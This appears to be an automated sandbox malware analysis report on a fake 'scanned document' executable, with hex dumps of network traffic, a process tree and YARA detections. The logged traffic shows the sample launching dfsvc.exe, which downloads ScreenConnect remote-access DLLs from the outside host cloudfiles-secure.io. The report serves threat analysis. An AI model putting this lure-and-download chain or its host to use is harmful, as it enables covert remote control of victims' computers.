                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC16384INData Raw: 08 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01
                                                                                                                                                                                                                                                                        Data Ascii: *2{8o*6{8o*0){:(t|:(O+3*0){:(t|:(O+3*0)Z{:s%{9X}9o(P+*f}9({8o*(*2{8o*2{8(r
                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC16384INData Raw: 7b 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30
                                                                                                                                                                                                                                                                        Data Ascii: {=,{=o"{<,{<o",o"(`&*4iA5$0J( "(,("?}s~(s}ts}q*0){x(t|x(+3*0
                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC16384INData Raw: 28 d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04
                                                                                                                                                                                                                                                                        Data Ascii: (+~s`(!+(%-&(oA(*~**(oA(~oo*.(o^*.(oD*.(oJ*.(oL*.(oH*.(oB*.(oD*.(oF*.(oD*.(ob*.(od*.(of*.(
                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC16384INData Raw: 0a 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9
                                                                                                                                                                                                                                                                        Data Ascii: %(!+*0EAs}s(+~%-&~s%(+*0.B~r@pd(o,o"*"(s(,#(o(**V(-s*s*f(-s
                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC16384INData Raw: 6f fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06
                                                                                                                                                                                                                                                                        Data Ascii: o((((*v(#% o% o*0(,+((((,((s;*(((((-d(((((-?(((((-((((


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        12192.168.2.549743178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:23:12 UTC95OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:23:12 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 548864
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:23:12 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:23:12 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
                                                                                                                                                                                                                                                                        2024-10-02 04:23:12 UTC16384INData Raw: 06 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72
                                                                                                                                                                                                                                                                        Data Ascii: &*{l*"}l*:(<(m*0(<oF{n-(++,}n{n*>oo*>(o}p*03=-*(qo{p_,B{r,(stsu(,+&}p|r*o{p3{r
                                                                                                                                                                                                                                                                        2024-10-02 04:23:12 UTC16384INData Raw: 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80
                                                                                                                                                                                                                                                                        Data Ascii: :(}+(~+&*0TBE +(s+0s+&s+s+rpsz*Z(<(*~%-&~s%(+*0%(-*o(-*:((
                                                                                                                                                                                                                                                                        2024-10-02 04:23:13 UTC16384INData Raw: 00 d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00
                                                                                                                                                                                                                                                                        Data Ascii: o:3*oXo(Y+s9*%-&~o~%-&~s%(+(n(r+*n((*>s%}*s'~%-&Ds;%(+*(+(+-j+j(L(+*&f__`*v(
                                                                                                                                                                                                                                                                        2024-10-02 04:23:13 UTC16384INData Raw: 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a
                                                                                                                                                                                                                                                                        Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
                                                                                                                                                                                                                                                                        2024-10-02 04:23:13 UTC16384INData Raw: 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28
                                                                                                                                                                                                                                                                        Data Ascii: (jX}{~*(+*0)Q{(+tO|(+3*0)Q{(-tO|(+3*V(6}}*{*{*Z(>Z((?X*(=u}u}*(c,{(
                                                                                                                                                                                                                                                                        2024-10-02 04:23:13 UTC16384INData Raw: 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07
                                                                                                                                                                                                                                                                        Data Ascii: o-,o*290Dyo+&ooo(o(o-,o*29(<}=}>}?}@}A*{=*{>*{?*{@*{A*0G*~-:~(,~
                                                                                                                                                                                                                                                                        2024-10-02 04:23:13 UTC16384INData Raw: 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00
                                                                                                                                                                                                                                                                        Data Ascii: :j******0iY(`(2*sjz(<*.s2*(<*2{3oB*(<*6{o{*(<*6{o{*.s8*(<*"(]*"(c*(<*0{;(+d(zo6*0
                                                                                                                                                                                                                                                                        2024-10-02 04:23:13 UTC16384INData Raw: 07 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a
                                                                                                                                                                                                                                                                        Data Ascii: (V*(<*6{/o0*6{/o0*(<*J{"{#(1*(<*J{'{((1*.s%*(<*o"*oC*.s(*(<*oC*.s**(<*"(R*:NoC*.s-*(<*:oC*(<*
                                                                                                                                                                                                                                                                        2024-10-02 04:23:13 UTC16384INData Raw: 01 f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03
                                                                                                                                                                                                                                                                        Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5


                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:00:22:49
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x830000
                                                                                                                                                                                                                                                                        File size:83'368 bytes
                                                                                                                                                                                                                                                                        MD5 hash:3D6752AEA446D36E3078F6AE7C0490A1
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                                        Start time:00:22:49
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x22705d80000
                                                                                                                                                                                                                                                                        File size:24'856 bytes
                                                                                                                                                                                                                                                                        MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                        Start time:00:22:49
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                        Start time:00:22:50
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572
                                                                                                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                        Start time:00:22:50
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684
                                                                                                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                        Start time:00:22:50
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                        Start time:00:22:52
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
